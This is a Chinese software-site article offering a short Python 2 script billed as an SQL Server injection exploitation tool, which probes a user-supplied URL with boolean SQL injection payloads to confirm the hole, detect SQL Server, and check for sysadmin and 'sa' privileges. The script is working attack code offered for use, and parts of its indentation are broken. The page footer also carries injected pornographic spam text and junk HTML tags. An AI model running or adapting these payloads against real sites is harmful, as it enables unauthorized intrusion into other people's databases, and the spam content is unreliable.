Python編寫數據庫SA用戶檢測方案_西西軟件資訊

<td id="ae6ms"><li id="ae6ms"></li></td>

<xmp id="ae6ms"><td id="ae6ms"></td><table id="ae6ms"></table>

<table id="ae6ms"></table>

^{<td id="ae6ms"></td>}

<td id="ae6ms"></td>

<table id="ae6ms"></table><table id="ae6ms"><td id="ae6ms"></td></table>

<td id="ae6ms"></td>

<table id="ae6ms"><li id="ae6ms"></li></table>

<table id="ae6ms"></table>

西西軟件園多重安全檢測下載網站、值得信賴的軟件下載站！

軟件: 軟件; 文章

搜索

首頁 → 西西教程 → 數據庫教程 → Python編寫數據庫SA用戶檢測方案

Python編寫數據庫SA用戶檢測方案

相關軟件相關文章發表評論來源：本站整理時間：2011/7/14 15:03:48字體大?。?em class="fontsize">A-A+

作者：西西點擊：181次評論：0次標簽： Python

《派森》(Python)3.13 win32 英文安裝版

類型：編程工具大?。?i>21M語言：英文評分：8.7

標簽：

立即下載

無聊的時候，用Python寫的一個小程序，用有注入點的鏈接，檢測當前數據庫用戶是否為sa，沒什么技術含量。
# Code by zhaoxiaobu Email: little.bu@hotmail.com
#-*- coding: UTF-8 -*-
from sys import exit
from urllib import urlopen
from string import join,strip
from re import search

def is_sqlable():
    sql1="%20and%201=2"
    sql2="%20and%201=1"
    urlfile1=urlopen(url+sql1)
    urlfile2=urlopen(url+sql2)
    htmlcodes1=urlfile1.read()
    htmlcodes2=urlfile2.read()
    if not search(judge,htmlcodes1) and search(judge,htmlcodes2):
    print "[信息]恭喜!這個URL是有注入漏洞的!\n"
    print "[信息]現在判斷數據庫是否是SQL Server,請耐心等候....."
    is_SQLServer()
    else:
    print "[錯誤]你確定這個URL能用?換個別的試試吧!\n"

def is_SQLServer():
    sql = "%20and%20exists%20(select%20*%20from%20sysobjects)"
    urlfile=urlopen(url+sql)
    htmlcodes=urlfile.read()
    if not search(judge,htmlcodes):
    print "[錯誤]數據庫好像不是SQL Server的!\n"
    else:
    print "[信息]確認是SQL Server數據庫!\n"
    print "[信息]開始檢測當前數據庫用戶權限,請耐心等待......"
    is_sysadmin()

def is_sysadmin():
    sql = "%20and%201=(select%20IS_SRVROLEMEMBER('sysadmin'))"
    urlfile = urlopen(url+sql)
    htmlcodes = urlfile.read()
    if not search(judge,htmlcodes):
        print "[錯誤]當前數據庫用戶不具有sysadmin權限!\n"
    else:
        print "[信息]當前數據庫用戶具有sysadmin權限!\n"
        print "[信息]檢測當前用戶是不是SA,請耐心等待......"
        is_sa()

def is_sa():
    sql = "%20and%20'sa'=(select%20System_user)";
    urlfile = urlopen(url+sql)
    htmlcodes = urlfile.read()
    if not search(judge,htmlcodes):
        print "[錯誤]當前數據庫用戶不是SA!\n"
    else:
        print "[信息]當前數據庫用戶是SA!\n"




print "\n########################################################################\n"
print "                       ^o^SQL Server注入利用工具^o^          "
print "                      Email: little.bu@hotmail.com\n"
print "========================================================================";
url = raw_input('[信息]請輸入一個可能有注入漏洞的鏈接!\nURL:')
if url == '':
    print "[錯誤]提供的URL必須具有 '.asp?xxx=' 這樣的格式"
    exit(1)

judge = raw_input("[信息]請提供一個判斷字符串.\n判斷字符串:")
if judge == '':
    print "[錯誤]判斷字符串不能為空!"
    exit(1)

is_sqlable()

相關文章

01-26Python的迭代器和生成器使用實例及yield的使用
01-26python獲取本機ip主機名等信息
01-06Aptana Studio 3配置Python開發環境圖文教程
08-17學習Python語言中文怎么輸出
08-01python處理文本文件實現生成指定格式文件的方法
04-22python編碼規范總結、python編碼轉換
02-25Python連接mysql數據庫、python使用mysqldb連接數據庫
02-16python編碼問題總結
11-06Python基礎教程：元類
10-21CentOS+nginx+uwsgi+Python 多站點環境搭建

相關評論

閱讀本文后您有什么感想? 已有23人給出評價!

8 喜歡

3 頂

1 難過

5 囧

3 圍觀

2 無聊

熱門評論

最新評論

發表評論查看所有評論(0)

昵稱:

表情:

字數: 0/500 (您的評論需要經過審核才能顯示)

推薦文章

安裝MSDE2000，提示“為了安全起見，要求使用強 SA 密碼?！?/span> SQL Server 2008 中文版全安裝過程圖文介紹

相關下載

名稱大小下載

最新文章

聯系我們 | 發展歷程 | 版權聲明 | 下載幫助(？) | 廣告服務 | 軟件提交 | 網站地圖 | 意見反饋

聲明：西西軟件園為非贏利性網站不接受任何贊助和廣告鄂ICP備11008782號-1

女人让男人桶30分钟免费视频，女人张开腿让男人桶个爽，一进一出又大又粗爽视频

<td id="ae6ms"><li id="ae6ms"></li></td>

<xmp id="ae6ms"><td id="ae6ms"></td><table id="ae6ms"></table>

<table id="ae6ms"></table>

^{<td id="ae6ms"></td>}

<td id="ae6ms"></td>

<table id="ae6ms"></table><table id="ae6ms"><td id="ae6ms"></td></table>

<td id="ae6ms"></td>

<table id="ae6ms"><li id="ae6ms"></li></table>

<table id="ae6ms"></table>